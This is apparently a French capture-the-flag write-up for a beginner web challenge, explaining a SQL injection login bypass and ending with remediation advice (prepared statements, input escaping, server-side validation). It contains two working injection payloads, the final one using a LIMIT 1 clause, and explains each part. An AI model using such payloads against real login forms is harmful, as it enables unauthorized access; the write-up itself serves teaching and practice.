Solution de FrenchPhalange pour Push it to the limit

intro web PHP

20 janvier 2025

Table des matières

🎯 Objectif

Se connecter à l’application web en exploitant une vulnérabilité d’injection SQL.

🔍 Découverte

En inspectant le code source de l’application, on trouve un commentaire HTML révélant la structure de la requête :

SELECT * FROM users WHERE username="[INPUT]" AND password="[INPUT]"

💉 Exploitation

Première tentative

" OR "1"="1" --

➜ Erreur : “trop de lignes sont retournées par la requête SQL”

🛠️ Solution finale

" OR "1"="1" LIMIT 1 --

Comment ça marche ?

" ferme le guillemet de la requête
OR "1"="1" ajoute une condition toujours vraie
LIMIT 1 restreint le résultat à une seule ligne
-- commente le reste de la requête

🎉 Flag

Flag obtenu après connexion réussie !

Correction

Pour sécuriser ce type de vulnérabilité :

Utiliser des requêtes préparées
Échapper correctement les entrées utilisateur
Implémenter une validation côté serveur

L'API a renvoyé une erreur.

L'API a renvoyé une erreur : merci de vérifier que vous n'avez pas déjà envoyé une solution pour cette épreuve.

Le flag est correct, bien joué !

Le flag est incorrect.

Vous devez fournir une URL GitHub Gist valide.

La solution a été soumise avec succès, merci !